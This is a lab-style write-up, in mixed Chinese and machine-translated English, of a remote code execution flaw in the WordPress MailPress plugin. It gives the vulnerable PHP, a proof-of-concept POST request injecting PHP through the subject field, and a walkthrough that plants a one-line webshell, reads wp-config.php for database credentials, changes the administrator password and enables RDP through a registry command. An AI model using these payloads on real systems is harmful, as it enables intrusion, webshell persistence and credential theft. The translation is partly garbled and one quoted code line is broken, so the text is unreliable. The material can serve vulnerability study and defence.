0x01 Mailpress plugin RCE漏洞

1.简介

WordPress Mailpress Plugin 插件中, mailpress/mp-includes/class/MP_Actions.class.php 文件中 iview() 函数中 subject Parameters are not filtered,直接拼接do_eval函数执行代码,而do_evalFunctions are also not filtered in any way,导致远程代码执行漏洞.
详情链接

2.相关代码

public static function iview(){
    
    $mp_general = get_option(MailPress::option_name_general);
    $id = $_GET["id"];
    $main_id = (isset($_GET["main_id"])) ? $_GET["main_id"] : $id;
    $mail = MP_Mail::get($id);
    $theme = (isset($_GET["theme"]) && !empty($_GET["theme"])) ? $_GET["theme"] : (!empty($mail->theme) ? $mail->theme : false);
    $mp_user_id = (isset($_GET["mp_user_id"]) && !empty($_GET["mp_user_id"])) ? $_GET["mp_user_id"] : false;

    // from
    $from = (!empty($mail->fromemail)) ? MP_Mail::display_toemail($mail->fromemail, $mail->fromname) : MP_Mail::display_toemail($mp_general["fromemail"], $mp_general["fromname"]);
    // to
    $to = MP_Mail::display_toemail($mail->toemail, $mail->toname, ", $mp_user_id); // subject $x = new MP_Mail(); // // 注意这里调用了 do_eval // $subject = (in_array($mail->status, array("sent", "archived"))) ? $mail->subject : $x->do_eval($mail->subject);
    //
    $subject = $x->viewsubject($subject, $id, $main_id, $mp_user_id);
    // template
    ...
}

0x02 POC构造

• Use exploit code to trigger the vulnerability：

http://你的 IP 地址:端口号/wp-content/plugins/mailpress/mp-includes/action.php

• POST data：

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

• 返回值如下：

<wp_ajax><response action="autosave_2"><autosave id="2" old_id="2" position="1"><response_data>Draft saved at pm5:58:36.</response_data><supplemental><tipe>mail</tipe></supplemental></autosave></response></wp_ajax>

记录下autosave id的值,接下来使用.

• Visit the Vulnerables page for results：

http://你的 IP 地址:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=returned in the previous stepid号

直接获取phpinfo()的页面.

0x03 靶场漏洞复现

• 先访问IPhttp://192.168.*.*/,Obviously a useWPride site.

• 由于是WPtake the station,我们可以先使用WPScan扫一手（使用WPScan时,Plus officialAPIVulnerability details can be revealed）,在kali终端输入命令# wpscan --url http://192.168.*.* --api-token KDgPmudZ16JIzMsyadPAh8s6paUp9yAZxHTO5FYfyGg ,A sensitive directory can be obtained.（But it seems to have been addedAPI没什么用）
  获取API链接
  

• 访问192.168.*.*/html,Get a configuration file for the websitewp-config.php.
  

• 接下来利用RCE漏洞,在ip后面加上/wp-content/plugins/mailpress/mp-includes/action.php,利用hackbar,Change the parameter to POST类型,在POST dataconstruct the code that needs to be executed,得到autosave id=14.
  

• 访问http://192.168.*.*/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=14,Get the website root directory.
  

• Now you know the website root directory,接下来将POST传参中的subjectThe parameter is changed to write a sentence Trojan,如下所示.

<?php file_put_contents('C:/phpstudy123/WWW/1.php','<?php @e*al($_POST[cmd]);?>');?>

• 访问http://192.168.*.*/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=16,And use the ant sword to connecthttp://192.168.*.*/1.php,然后就成功getshell.
  
  

• 然后访问C:/phpstudy123/WWW/wp-config.php,Get information about the database.
  

• 使用蚁剑,Use the above information to connect to the database.
  

• 使用nmapCheck if the host is turned on3389端口,发现没有开.View operating system user information on the Antjian terminal,修改管理员密码,Just open3389端口.Then you can connect remotely.

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f